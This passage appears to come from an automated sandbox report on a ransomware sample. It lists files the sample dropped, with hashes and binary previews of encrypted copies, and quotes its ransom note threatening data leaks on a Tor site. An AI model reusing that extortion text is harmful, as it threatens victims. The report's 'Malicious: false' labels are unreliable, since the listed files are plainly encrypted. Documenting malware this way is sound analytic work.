SHA-512:	FFA8A4216E1B4B6A33B0B8832D230F0C10D547180358341EA41F373F2A5394D7250F14FCB1DA0EA6A4A8F308A6B79DD334A50DFEE3BA71A4B9648F55907F68B0
Malicious:	false
Preview:	@....Sa.&..r=.xf.........qx......'.v2..S.9.."...S.Lv7`./$?..2..y.#.e...SBM;......!.^m...b.....=..=dG^.T...!.^...w..B.....vl..V....H..".b+.A..${C..b......z.,....Ki.\|.P.?....].iZ..r.?..j.k....d.......,...K.X..wL...u.ZtgD.v0..T.n...A..l1pO.{...\.p.$.A.U....0...h.rc..o.,;........Y...t..^.7^..^B9o..%../q3.+,P#.W.9.U...1...f4)5.:0.I.e.0.w..Z....yT..Z....&..f..4C0...............]@......{.`oM.5.A.fFG....._.>.....X..Ee.H(.b........J..q.{`.'.Y..H.....t.....{...F...?...q....20..B...n-..E..O..Uf.ofP...{.}n.c....V<..}G.(.x....C.\|...}X4....'.i^......7..i.4.-/n.h."..4.NJ.[`.70..6G...N.E...-.....N!#e.$..V.z...!a..&vs.V.F...'....1tJd.....F7z-GR.z2...?..(..P[.......Bn......KlS:8......e....B.O....[_.8..<....MQ.n...T..6....K_.W...O.....(..E4.k.d.....U..UpCH.._:..S...n..W.(._....I.......;.e.\|c[.'....vR.Zh..r..Z_.].t..~@,.....+.9vb.i.,....y'.AB.#wo..-e>..b........>;..&S.*.:.(31...5W.{.\|.6q.....'.d4J...rT..O$....;....n.lGX..V.z....;.......I.9rO...o.f.Q.7\|F.;..

C:\Users\user\Documents\LSBIHQFDVT\QCFWYSKMHA.jpg Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.981199434264514
Encrypted:	false
SSDEEP:	192:aAcfOxz2G7wdknkSsM/huZCO/WF6L9oiVIyQ4e0T1vXsvSaiGV+n:BbxzT7wdikSsMICKW2uiVDQ4/USaij
MD5:	8D1E252E9F62995AD91F618034A67CC7
SHA1:	6187D26E85C6C6754FDD8112D53113C04AD275A5
SHA-256:	CDB9246CFB72E0E7E184E369898F50904ED3913E2E7D9D4DDAB531931AD0BB42
SHA-512:	F0DDB6FF6FB2587E3BE48FD51EFE1E03AAC5A16523D1BF688BDA950D59AF4806C2B21E9523573C70F03F07F6796EC60521F21FA0C1DAEFF06AEEF97455C3D73E
Malicious:	false
Preview:	h\..^....`O.t.......>.C8V...WHL.."h...L5..B...5p..."...{...h$a..i...0...0...;8x...X......H..y.C..=...m........q..1...\...<w_U\n4.._VA...tD6.@........=F;a.....u.)..R.[..#..!."Of0.Z..r....:..$$]...aK.....%}..... v\x.qK..[..jt..^...8.;1.-,....m....{I.1....=./.."...%.#...}...O[.3C...A./.$..o.p..3....9.UO..W.........R[...k...-S.\|E.......X..fA%......~X.kq...N..Q.+....~..K'..o./..m.'W....I...^G..^v[I.R.........`.=...... 0...].dRV.fnNX......t.@.w.^..S..=...H\........9B]..m.<.e....L<..P.]...........Q.n...G.r....W.]..4.c.Ct.-_....K)..3@ ....Ec..[7?.9..B...I.AK.o.A0..G.i..I2.'u..Q......e@.*n..M.....l&_.dh....F.........u..:.t~.....t..@N.....l..Z....7.uW.{`.)2}.;..\...%)\.G..2.I((....g....X.....er.F.\|....j..P.+.e......aK........<{..}...r.g.`.+.9Vj~.Htg.+.....<...lF.B.^3A..9\|h..Jr.\..e.q.Q...?...v....7._..ff.m.AQ......6R......a..Y.....W...2.....+.<..#.0P...%.!.5.8..?...i.QV....`.r.0.m.P.....C.3I. ...W4.+G[.VZ..>.#........D...

C:\Users\user\Documents\LSBIHQFDVT\QCFWYSKMHA.jpg.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.981199434264514
Encrypted:	false
SSDEEP:	192:aAcfOxz2G7wdknkSsM/huZCO/WF6L9oiVIyQ4e0T1vXsvSaiGV+n:BbxzT7wdikSsMICKW2uiVDQ4/USaij
MD5:	8D1E252E9F62995AD91F618034A67CC7
SHA1:	6187D26E85C6C6754FDD8112D53113C04AD275A5
SHA-256:	CDB9246CFB72E0E7E184E369898F50904ED3913E2E7D9D4DDAB531931AD0BB42
SHA-512:	F0DDB6FF6FB2587E3BE48FD51EFE1E03AAC5A16523D1BF688BDA950D59AF4806C2B21E9523573C70F03F07F6796EC60521F21FA0C1DAEFF06AEEF97455C3D73E
Malicious:	false
Preview:	h\..^....`O.t.......>.C8V...WHL.."h...L5..B...5p..."...{...h$a..i...0...0...;8x...X......H..y.C..=...m........q..1...\...<w_U\n4.._VA...tD6.@........=F;a.....u.)..R.[..#..!."Of0.Z..r....:..$$]...aK.....%}..... v\x.qK..[..jt..^...8.;1.-,....m....{I.1....=./.."...%.#...}...O[.3C...A./.$..o.p..3....9.UO..W.........R[...k...-S.\|E.......X..fA%......~X.kq...N..Q.+....~..K'..o./..m.'W....I...^G..^v[I.R.........`.=...... 0...].dRV.fnNX......t.@.w.^..S..=...H\........9B]..m.<.e....L<..P.]...........Q.n...G.r....W.]..4.c.Ct.-_....K)..3@ ....Ec..[7?.9..B...I.AK.o.A0..G.i..I2.'u..Q......e@.*n..M.....l&_.dh....F.........u..:.t~.....t..@N.....l..Z....7.uW.{`.)2}.;..\...%)\.G..2.I((....g....X.....er.F.\|....j..P.+.e......aK........<{..}...r.g.`.+.9Vj~.Htg.+.....<...lF.B.^3A..9\|h..Jr.\..e.q.Q...?...v....7._..ff.m.AQ......6R......a..Y.....W...2.....+.<..#.0P...%.!.5.8..?...i.QV....`.r.0.m.P.....C.3I. ...W4.+G[.VZ..>.#........D...

C:\Users\user\Documents\LSBIHQFDVT\SUAVTZKNFL.mp3 Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.979178222944676
Encrypted:	false
SSDEEP:	192:92snKpu0PGTw4C//1FSQ8E0rFVQy1zLTE2z/CvkBq4S57GsihV+n:xau003C//SQ8E0hLSveq4Q
MD5:	7E250C31357C760CAC44DF3C9F8B3BA2
SHA1:	D85FF1AB6376A028B3E679F276A3F68D3BFDF31D
SHA-256:	8D2E0D94B494DA12BCDDB77CDD2B607CF24927C56DB3A9DC58A011DF0B73B44B
SHA-512:	56833917A0029DA5A13F331D0B3EBA1FAB594870DA1C506A87434A89D1E8AC49775D21A32E360C92CFF8FB24BDA9EB1C6B2BD91919BE0CE0F546B3C0EF5EC515
Malicious:	false
Preview:	.M..>.)....9.OG.Z._qy....f.i.V..,..$......S.P..^.....G..E.y.._.........X.......i..$%L%........S..P.z;.(...;..F..D....ml..........6.T.r.....+..S.....]..MwZ.n&...G.y3T=..b.;&...6...d8."..>.@.^lS..<......AX({x....E.,\..G...zr...._Xc;......x.q.gk.d....j...cM...Pz-.3W)..f.".N.......AZ..$.A...lk.._...!5+....;;2n...P..o.)."....."..s..K..2)....lf."$...1................ )D:O......{n<.@).N.....<...y..\.bG.....c..D.t.'-x%h.s...Q.....0.....v......<..C..P.P.0....[jl{.r.Z.!....R.ns..H.C_.j.........f.S?u..3o1...9z..c.E.".......y). .1...Q.[)&.R...........q...`....nX..8D13G`...O\.....l....'....y....\..\.fW.\|.H..V..$p3.....ovMA..Q. ..K.:...."~.3uS9..{.4.l......!..X.e.........u...........H.i......O.`.3.4...$.4AF..8..A..HeJ...m*......4YOH)>Z7VoCB.n.p9..5..O...r(..Wxm..g.....o..SC}....>..q.k#.:A......k.6......a.:.........".D..(...]].....qi..~.N.yyATFz.T.uH8.&.J!R..&6U].[..:<.lR.NY.nlR...[..H..r...u&../'%2...?...U.r..G..~ )c1i.O.9...X....C.f....P8

C:\Users\user\Documents\LSBIHQFDVT\SUAVTZKNFL.mp3.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.979178222944676
Encrypted:	false
SSDEEP:	192:92snKpu0PGTw4C//1FSQ8E0rFVQy1zLTE2z/CvkBq4S57GsihV+n:xau003C//SQ8E0hLSveq4Q
MD5:	7E250C31357C760CAC44DF3C9F8B3BA2
SHA1:	D85FF1AB6376A028B3E679F276A3F68D3BFDF31D
SHA-256:	8D2E0D94B494DA12BCDDB77CDD2B607CF24927C56DB3A9DC58A011DF0B73B44B
SHA-512:	56833917A0029DA5A13F331D0B3EBA1FAB594870DA1C506A87434A89D1E8AC49775D21A32E360C92CFF8FB24BDA9EB1C6B2BD91919BE0CE0F546B3C0EF5EC515
Malicious:	false
Preview:	.M..>.)....9.OG.Z._qy....f.i.V..,..$......S.P..^.....G..E.y.._.........X.......i..$%L%........S..P.z;.(...;..F..D....ml..........6.T.r.....+..S.....]..MwZ.n&...G.y3T=..b.;&...6...d8."..>.@.^lS..<......AX({x....E.,\..G...zr...._Xc;......x.q.gk.d....j...cM...Pz-.3W)..f.".N.......AZ..$.A...lk.._...!5+....;;2n...P..o.)."....."..s..K..2)....lf."$...1................ )D:O......{n<.@).N.....<...y..\.bG.....c..D.t.'-x%h.s...Q.....0.....v......<..C..P.P.0....[jl{.r.Z.!....R.ns..H.C_.j.........f.S?u..3o1...9z..c.E.".......y). .1...Q.[)&.R...........q...`....nX..8D13G`...O\.....l....'....y....\..\.fW.\|.H..V..$p3.....ovMA..Q. ..K.:...."~.3uS9..{.4.l......!..X.e.........u...........H.i......O.`.3.4...$.4AF..8..A..HeJ...m*......4YOH)>Z7VoCB.n.p9..5..O...r(..Wxm..g.....o..SC}....>..q.k#.:A......k.6......a.:.........".D..(...]].....qi..~.N.yyATFz.T.uH8.&.J!R..&6U].[..:<.lR.NY.nlR...[..H..r...u&../'%2...?...U.r..G..~ )c1i.O.9...X....C.f....P8

C:\Users\user\Documents\LSBIHQFDVT\ZQIXMVQGAH.xlsx Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.97770889640404
Encrypted:	false
SSDEEP:	192:1OFyJIuTyLinB+wu7FftKhn1W6MML5XhmBDOPxzjz2Ln1Xd9hc6V+n:1SiIunC7uhnvMMNhHPdYTq
MD5:	9F58A7CC877B753E2FA7D58109062E52
SHA1:	BBFA043B847711BAC7AB1860E1634B29CFAA22DE
SHA-256:	C67E3F8CAC95F1FFC71C07C6F17B1641FC0DEBBA397E972DCADFF6C7BE6B8E4D
SHA-512:	0F3F55FD418EA12D55F0C351E043E3D941465E0C0CF04C63302D14A1D5C74572B9E8850365FE9EC9B34C0EF463D6367DB4CB5E28198570F8A0703B219681ACB4
Malicious:	false
Preview:	C..1...W......'...u.%".,....w...B........PJ...b..s.OG...r._.@.k.T}`#o..$J..^4....!nK.Rv.K.....\..I....!.g......C.........-5a.........p......V'...{.-.A..Ue.C9..$....R..Emos..v.B..JR.M Uo.5.z...>.43.88o%Q...>.....'.a.M.A.?".4...sI8....\.u..+.e..A....z#.S...-......3%..p.$.!G.....0H..../.0....y.S..U..<6VBu`...\|...2...y....1[.....+.$..Y2.ew.....v.\.?,B.z...o.....\Io...lE. .........N./..m......[l4{..@..U..u..T.Y...Hw...:.(`.t..,.@.1.......2._.q.l.&.P.vE4..........N.U(..8.Qn..F..4.i..P..JNCZz.......c,d/.\|..^......6M..7....=Q..].......-..m...k.oA...E..........XD...eY..P.....PJ.X.JI.v...+...p.?...=..UYM$.......l 8..Tp<.y-...i.w4b6Bp..^\|@....y.!.:jzO......4.wt..b..-.7>R.......;F).n.....?.=.....}..........)...4Q.6.I.....T.ZM......XA+A.l..TR...S..j.~J.W..v..f.1I..%.^..Qs....{..~..J.x.UW.._....mJLa....57&..O......J.etEm.v.f.........aP...p+A.N^.<.....z..t...4T...q!...XL.~.z..\|.....=.=...:.9v.e..j.....v.0.o...;.G..;....y..A+..=/..'k)..].....0=r#..I

C:\Users\user\Documents\LSBIHQFDVT\ZQIXMVQGAH.xlsx.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.97770889640404
Encrypted:	false
SSDEEP:	192:1OFyJIuTyLinB+wu7FftKhn1W6MML5XhmBDOPxzjz2Ln1Xd9hc6V+n:1SiIunC7uhnvMMNhHPdYTq
MD5:	9F58A7CC877B753E2FA7D58109062E52
SHA1:	BBFA043B847711BAC7AB1860E1634B29CFAA22DE
SHA-256:	C67E3F8CAC95F1FFC71C07C6F17B1641FC0DEBBA397E972DCADFF6C7BE6B8E4D
SHA-512:	0F3F55FD418EA12D55F0C351E043E3D941465E0C0CF04C63302D14A1D5C74572B9E8850365FE9EC9B34C0EF463D6367DB4CB5E28198570F8A0703B219681ACB4
Malicious:	false
Preview:	C..1...W......'...u.%".,....w...B........PJ...b..s.OG...r._.@.k.T}`#o..$J..^4....!nK.Rv.K.....\..I....!.g......C.........-5a.........p......V'...{.-.A..Ue.C9..$....R..Emos..v.B..JR.M Uo.5.z...>.43.88o%Q...>.....'.a.M.A.?".4...sI8....\.u..+.e..A....z#.S...-......3%..p.$.!G.....0H..../.0....y.S..U..<6VBu`...\|...2...y....1[.....+.$..Y2.ew.....v.\.?,B.z...o.....\Io...lE. .........N./..m......[l4{..@..U..u..T.Y...Hw...:.(`.t..,.@.1.......2._.q.l.&.P.vE4..........N.U(..8.Qn..F..4.i..P..JNCZz.......c,d/.\|..^......6M..7....=Q..].......-..m...k.oA...E..........XD...eY..P.....PJ.X.JI.v...+...p.?...=..UYM$.......l 8..Tp<.y-...i.w4b6Bp..^\|@....y.!.:jzO......4.wt..b..-.7>R.......;F).n.....?.=.....}..........)...4Q.6.I.....T.ZM......XA+A.l..TR...S..j.~J.W..v..f.1I..%.^..Qs....{..~..J.x.UW.._....mJLa....57&..O......J.etEm.v.f.........aP...p+A.N^.<.....z..t...4T...q!...XL.~.z..\|.....=.=...:.9v.e..j.....v.0.o...;.G..;....y..A+..=/..'k)..].....0=r#..I

C:\Users\user\Documents\LSBIHQFDVT\uCLrcwQ_readme_.txt Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	ASCII text, with very long lines, with CRLF, CR, LF line terminators
Category:	dropped
Size (bytes):	3757
Entropy (8bit):	5.7295047567070965
Encrypted:	false
SSDEEP:	48:L9k0ZzV7L/vNbXGZULVDgUp4qNiiE6bm1c0rfWejhAe/YAliM3PXnLHrYxgkH69K:L95zhLNbXGZUe7Ka6pU6i9fLrvE69USm
MD5:	3C41F7CA18B8945F6821481356FC9244
SHA1:	AD871AF22DB7CADE6E00759B53747B9B37772AC2
SHA-256:	1C5ABC28C85D76E02D08CC3D29DAA53E5B8AEDD8945FED659BABD5AA98DE57F8
SHA-512:	C092E6807636E362DA896D9C0EF5872330341EDD5D1575358D4D40814B60E0548CBDD9EB15F70F06CBA57AC9DCC496502069DB52CA2116AE43680D8F6A7F0886
Malicious:	false
Preview:	-------=== Your network has been infected! ===-------.........*************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED ***************.........All your documents, photos, databases and other important files have been encrypted and have the extension: .bCcBDeabea......You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files!......The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files!......We have also downloaded a lot of private data from your network....If you do not contact as in a 3 days we will post information about your breach on our public news website (avaddongun7rngel.onion) and after 7 days the whole downloaded info.......You can get more information on our page, which is located in a Tor hidden network..........How to get to our page...----------------------------------------------------------------------------

C:\Users\user\Documents\PALRGUCVEH.png Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.979224689359224
Encrypted:	false
SSDEEP:	192:G/UbDx61spAWmdbJA0GdY0hi4isXb3EqKfbQz8V+n:WkAam5JA0GvTnDzd
MD5:	802C203B29D025FEC9BB25C066F739A2
SHA1:	47659324F6263A6C875F5946FE84B9A092FA6B84
SHA-256:	0359E5B3909D3DD795479C944783EE95C7BDE7D08B1E7C9069F12B50D3EC2AFC
SHA-512:	DD4E02D09F09BEAB80336A17639D5722D6609C2AC699B49426408C8C67AF2B8ECECFEE0AE1B515D31E1AF4DFAB3462D54FDC4358C3463036F6FC1DBCDA620BDB
Malicious:	false
Preview:	d...1U..eMq.+g\....+...W;c..<..(/.nV.v....M..A.9}...2....`Y.<na{(.0Y.N...W..^..`.%k...:4.......<\j.Q.s.r.7!..........d./..0..NG..LF.`x.......Q..._.............9^..Z..QqW^.....@......... JkX.e64nYg.6."....Rn.BeX/.9a..s......Ot(J...H......\|S.<=..~..^}Hc.3......J.~.R....7.}E....'p4!3..b8b.fU=....f..4.}..s.nj........J..kq/.!5.".?).._d..qW<j.+#;.4.....w.E....H..Z.IB.i5.9D.YI.JAE.QE`..F.I..='J...g........M8C.j..0.:..-.......G.,.Aw..xe...2d.:..Kz... '..Q..N...;....l'..Z.....3h.].(a-...-.l....5s.7..[.......s)..A.].....Q>...O....e..S...............s.b...5fS.#...V.B.../.:.....m.E......jKS...Q....F.......}.."....#..8.%.b...! I......sc.+.Y...;...I.0.....tgv.{%.KC.......X..B.!0.DdC...Q.%.b...}y.@J8....8...G..F.vrlz...k.....~#.s3C............ ........@...H..r..-#m.".... .".X. s#..."3Q.j.4.H.Z..p.v.g.?m.i...g.....$.=...Y...m....N^.h..cg..\|.r......$..O.:...Lh.E...j..?S.\|...'..s.L;...98w..\uw.P.*,T._.@6e.k.{....v..f..y.DB.KT.E.m...u9..>0.....

C:\Users\user\Documents\PALRGUCVEH.png.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.979224689359224
Encrypted:	false
SSDEEP:	192:G/UbDx61spAWmdbJA0GdY0hi4isXb3EqKfbQz8V+n:WkAam5JA0GvTnDzd
MD5:	802C203B29D025FEC9BB25C066F739A2
SHA1:	47659324F6263A6C875F5946FE84B9A092FA6B84
SHA-256:	0359E5B3909D3DD795479C944783EE95C7BDE7D08B1E7C9069F12B50D3EC2AFC
SHA-512:	DD4E02D09F09BEAB80336A17639D5722D6609C2AC699B49426408C8C67AF2B8ECECFEE0AE1B515D31E1AF4DFAB3462D54FDC4358C3463036F6FC1DBCDA620BDB
Malicious:	false
Preview:	d...1U..eMq.+g\....+...W;c..<..(/.nV.v....M..A.9}...2....`Y.<na{(.0Y.N...W..^..`.%k...:4.......<\j.Q.s.r.7!..........d./..0..NG..LF.`x.......Q..._.............9^..Z..QqW^.....@......... JkX.e64nYg.6."....Rn.BeX/.9a..s......Ot(J...H......\|S.<=..~..^}Hc.3......J.~.R....7.}E....'p4!3..b8b.fU=....f..4.}..s.nj........J..kq/.!5.".?).._d..qW<j.+#;.4.....w.E....H..Z.IB.i5.9D.YI.JAE.QE`..F.I..='J...g........M8C.j..0.:..-.......G.,.Aw..xe...2d.:..Kz... '..Q..N...;....l'..Z.....3h.].(a-...-.l....5s.7..[.......s)..A.].....Q>...O....e..S...............s.b...5fS.#...V.B.../.:.....m.E......jKS...Q....F.......}.."....#..8.%.b...! I......sc.+.Y...;...I.0.....tgv.{%.KC.......X..B.!0.DdC...Q.%.b...}y.@J8....8...G..F.vrlz...k.....~#.s3C............ ........@...H..r..-#m.".... .".X. s#..."3Q.j.4.H.Z..p.v.g.?m.i...g.....$.=...Y...m....N^.h..cg..\|.r......$..O.:...Lh.E...j..?S.\|...'..s.L;...98w..\uw.P.*,T._.@6e.k.{....v..f..y.DB.KT.E.m...u9..>0.....

C:\Users\user\Documents\PWCCAWLGRE.mp3 Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.977419764888379
Encrypted:	false
SSDEEP:	192:qtUahdrxCzooIhTnc+b3fxghDJc9hGPJFkwr2nwx+9vTV+n:gUUdrxCMRc+4nPJOwrGwx+9vk
MD5:	96A61E76383B49B4DF4BF665094E724A
SHA1:	0E965FBB4A4CBC1C7060756AB264EFA572CFFD38
SHA-256:	5472BBC446E7245EA82B86651382A5F82F9F67FDFCF6C371CE708EA784DC5FAF
SHA-512:	A26587035C66AC3292A8DA70DFFBC36E45343E2A35F938BD7E0227FAEFC4614CB470E8224619405C925EDFBEB285B4D4585BA242A3A6A15DF7694A4741AB74B3
Malicious:	false
Preview:	B:7.,.......}...4...X....:lO881o..q....f..N.whhf...b.yS.#..%......V.ZC....q.\.-.x.h..%..w.k.Y..7.M...!(.k.a......w97..........eZ/...+...U%._.S)...+..5X....7v....Cf-..Ur=L...`S.l.+qp./nj.....j.>i...+~...;...8..q.J.q...k.=..Iwu.MG.....v.P.3.8..G......<.....9...T...G{..j...".......p8.o.W...b7+..Bm.R...~.k..p.U....&8sU..Q..!7....3i.F45.P....{......tUr.KC.....T.......e..i.\|:.....Y...Bo....E{Q.A..6.Db........nk......K.a.o.U#....b.......S..\.`....r........7..zO...8......6a.....E..ID.W.....3..D%h.Om..K.~....^......G.t....#..$....H#W....;.[3;.Pz..2q".w.r...f..]..8...5Z..\.....M1n..G..d.....<./1....../...9..a.E...K.....A..H..].Hr.y0.].Q.e.Q.yf.?....>.h{.......Y....w...;z.s.e./..}.u..(...w...o.L.A......1i..w..#r$).[.%'.3=...<9S@.....Tf......C..W3..a.....X.j.l...H.oo......k...#....>-..%W.;..Bx.X@Vf.S..IU.b......._...8.*G.Q_$.~#...3...Vm.x.9FW.r.....]\T?0w..3..9.N.f.o.u.B..>......7.A..;#...........D.C...T...-.H.E!....l...W.!......p....B_.1.Q.

C:\Users\user\Documents\PWCCAWLGRE.mp3.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.977419764888379
Encrypted:	false
SSDEEP:	192:qtUahdrxCzooIhTnc+b3fxghDJc9hGPJFkwr2nwx+9vTV+n:gUUdrxCMRc+4nPJOwrGwx+9vk
MD5:	96A61E76383B49B4DF4BF665094E724A
SHA1:	0E965FBB4A4CBC1C7060756AB264EFA572CFFD38
SHA-256:	5472BBC446E7245EA82B86651382A5F82F9F67FDFCF6C371CE708EA784DC5FAF
SHA-512:	A26587035C66AC3292A8DA70DFFBC36E45343E2A35F938BD7E0227FAEFC4614CB470E8224619405C925EDFBEB285B4D4585BA242A3A6A15DF7694A4741AB74B3
Malicious:	false
Preview:	B:7.,.......}...4...X....:lO881o..q....f..N.whhf...b.yS.#..%......V.ZC....q.\.-.x.h..%..w.k.Y..7.M...!(.k.a......w97..........eZ/...+...U%._.S)...+..5X....7v....Cf-..Ur=L...`S.l.+qp./nj.....j.>i...+~...;...8..q.J.q...k.=..Iwu.MG.....v.P.3.8..G......<.....9...T...G{..j...".......p8.o.W...b7+..Bm.R...~.k..p.U....&8sU..Q..!7....3i.F45.P....{......tUr.KC.....T.......e..i.\|:.....Y...Bo....E{Q.A..6.Db........nk......K.a.o.U#....b.......S..\.`....r........7..zO...8......6a.....E..ID.W.....3..D%h.Om..K.~....^......G.t....#..$....H#W....;.[3;.Pz..2q".w.r...f..]..8...5Z..\.....M1n..G..d.....<./1....../...9..a.E...K.....A..H..].Hr.y0.].Q.e.Q.yf.?....>.h{.......Y....w...;z.s.e./..}.u..(...w...o.L.A......1i..w..#r$).[.%'.3=...<9S@.....Tf......C..W3..a.....X.j.l...H.oo......k...#....>-..%W.;..Bx.X@Vf.S..IU.b......._...8.*G.Q_$.~#...3...Vm.x.9FW.r.....]\T?0w..3..9.N.f.o.u.B..>......7.A..;#...........D.C...T...-.H.E!....l...W.!......p....B_.1.Q.

C:\Users\user\Documents\QCFWYSKMHA.png Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.9812980140579235
Encrypted:	false
SSDEEP:	192:Fn/IhGIxJ0DSaaeBFO3KfbPotQfn2k95Oih7BRV+n:5IODdaeB06DPUy/u
MD5:	5FD3B283B515104AE6D9D1216008789C
SHA1:	E636BCED13ABB17638EDCBB87ECEF8707E925BCA
SHA-256:	E731D0751B6422A7797D8F4B74F1574378D0D1A199A98353C0C3B5C903F7E681
SHA-512:	ED10921BBDE1DE23F8527F3C5F2299F9B834EB05EEA9C63B20984C5DB92B026410F67DDB88A454D135CEBD98171E7DCE45AB55B4937B15DD7E37999286F63059
Malicious:	false
Preview:	..Z...5.3..=R.....AI..~....a.,;.n.j.I.+~UU.b.n...........Bp..a5..R..SI..fP......%..O.].K.[..}...,....?.m..(......bw`.s..q......=.l.2...W......A9o..:.5i3.......}a5......3...Z.R..V..(.+..Z...PgHX.!$9...f..I.\..-i......y.T4.;>.Y.N'.Y....U...?..Ed...-?....s.d....%.....`R..}.Q`..4....?0..Cg....e?S......@.T{@.9.'...F....]S,nQ.....O..}. I...7.._..e..\|jRB..j.k......(.f..G.U!..d.q..-bu.3..^I(....9{ib.8..0.G..=?....:.......e.u.....?.:r..].I...."..'.'9.....[%y...X..^z",W..nI.'.[hA<..P... ....C...~...X..-FF...s{`.n8..........@..?!U.#......?.+oD..).N....4h...pX.n..(.....BnPHf.....1.}.pq.].........)...yx\|].{..;{...O.=m..!.uu...^...8..dQq.J..M\|Lz.g...+.}...\|..oX..N^N;...^...e..8.@....e.......:....t!Iz\|.0]e.v...D.z....L..e.o..]vMr...GX.....".3.z.>.......M.AO.4..?..Dy.'....\......V../....q/So..E..4.....J4j.."..N"rj.&.p.Pf..=..J1U...E.K6..@.X....G.a.~.....9o..9.L..M...b...i.X\e.....G4fo...sK@..{..n...+. $..D.v... Xni.....[QQ4i.PX..o..Xy..*..;....G.....W.

C:\Users\user\Documents\QCFWYSKMHA.png.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.9812980140579235
Encrypted:	false
SSDEEP:	192:Fn/IhGIxJ0DSaaeBFO3KfbPotQfn2k95Oih7BRV+n:5IODdaeB06DPUy/u
MD5:	5FD3B283B515104AE6D9D1216008789C
SHA1:	E636BCED13ABB17638EDCBB87ECEF8707E925BCA
SHA-256:	E731D0751B6422A7797D8F4B74F1574378D0D1A199A98353C0C3B5C903F7E681
SHA-512:	ED10921BBDE1DE23F8527F3C5F2299F9B834EB05EEA9C63B20984C5DB92B026410F67DDB88A454D135CEBD98171E7DCE45AB55B4937B15DD7E37999286F63059
Malicious:	false
Preview:	..Z...5.3..=R.....AI..~....a.,;.n.j.I.+~UU.b.n...........Bp..a5..R..SI..fP......%..O.].K.[..}...,....?.m..(......bw`.s..q......=.l.2...W......A9o..:.5i3.......}a5......3...Z.R..V..(.+..Z...PgHX.!$9...f..I.\..-i......y.T4.;>.Y.N'.Y....U...?..Ed...-?....s.d....%.....`R..}.Q`..4....?0..Cg....e?S......@.T{@.9.'...F....]S,nQ.....O..}. I...7.._..e..\|jRB..j.k......(.f..G.U!..d.q..-bu.3..^I(....9{ib.8..0.G..=?....:.......e.u.....?.:r..].I...."..'.'9.....[%y...X..^z",W..nI.'.[hA<..P... ....C...~...X..-FF...s{`.n8..........@..?!U.#......?.+oD..).N....4h...pX.n..(.....BnPHf.....1.}.pq.].........)...yx\|].{..;{...O.=m..!.uu...^...8..dQq.J..M\|Lz.g...+.}...\|..oX..N^N;...^...e..8.@....e.......:....t!Iz\|.0]e.v...D.z....L..e.o..]vMr...GX.....".3.z.>.......M.AO.4..?..Dy.'....\......V../....q/So..E..4.....J4j.."..N"rj.&.p.Pf..=..J1U...E.K6..@.X....G.a.~.....9o..9.L..M...b...i.X\e.....G4fo...sK@..{..n...+. $..D.v... Xni.....[QQ4i.PX..o..Xy..*..;....G.....W.

C:\Users\user\Documents\QCFWYSKMHA.xlsx Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.978609401749966
Encrypted:	false
SSDEEP:	192:47CFQrbKGnx2ZSMYv1VHvT/81SRWazn0OKEHMz00nQgLd4OV+n:43rbqxGzTfDnb/HTWXdw
MD5:	5624F35BC79506D8A8957BD204ADB7B6
SHA1:	4F19BAE79CDBDB015FC01EE6EE095F5239CEEAF5
SHA-256:	7E73627B1633B11DDBC0F961755B7B52D13A4384EA87ABF8B0D3BD8952335161
SHA-512:	1CE81F2BB979F4380FC84364E5915CFD554460394BFB6A0297A1015B820CA9757338365EC006F0FD291636713091B488983088DF252E2EB8CC5B85358C543AEF
Malicious:	false
Preview:	{.....5..Kh...?@......D...noU...!.......5wM...h1..e.F}.!+.K..(....\|Q](..`~.\|,.....,'V.#.w..\...l...-.A.q..d.H.].....#-?..I.g..TQ=U...:h...^.A#o..iZ.R. .........e..Xy...Ut....r"-...k./.s\&U-....8..z....... Q.k1x..woE....U..}y.u.....zz.DpC.K..W...f.y...P.^F.\@@is..H..`.sl.t...w...^i+-..%.......-.#..2.....%...0..U.r.......3.Z%....l..<..'....0.............e0.../&.e.P.^[.q.M....<...B7.0..p.....#.B.`.?..j.'....}y'.........blUq".sE.?...-w+^..t..G\.K...MY;bw&..Z.}..B.)...6.x....5........:.\.U{X..]U.^ .)q...!\M...j.._p5..l[.YT.`..7...v].`\|8..^.W.]....;M..@&.0k[Q...v{P-q}....i....._fE.{.q.f.\|P...T.PN.1G..J..PER.g.MX....k.>..M...9..)O5.hQd.'GJ.w>>U....`e.g<x.....1.!gq.,..0>._.0q~..U......z.n`o....7...:.......R....0=D..4.,+..A'...F.i.Vv.Jm.$p^...M...3s...V..}.b.....C..f...c.}O.....yc ...{<G..`4..^3...d.z8Sq....9.%...'...#...F!.....0........._...g..]..x...zSf.=r...X.....]&.).QS..Tr...Q...zx\..2..*&^y..H..,..Q.F. qT9.g1.K.+.1..<:.0...;3_.2..%.5.

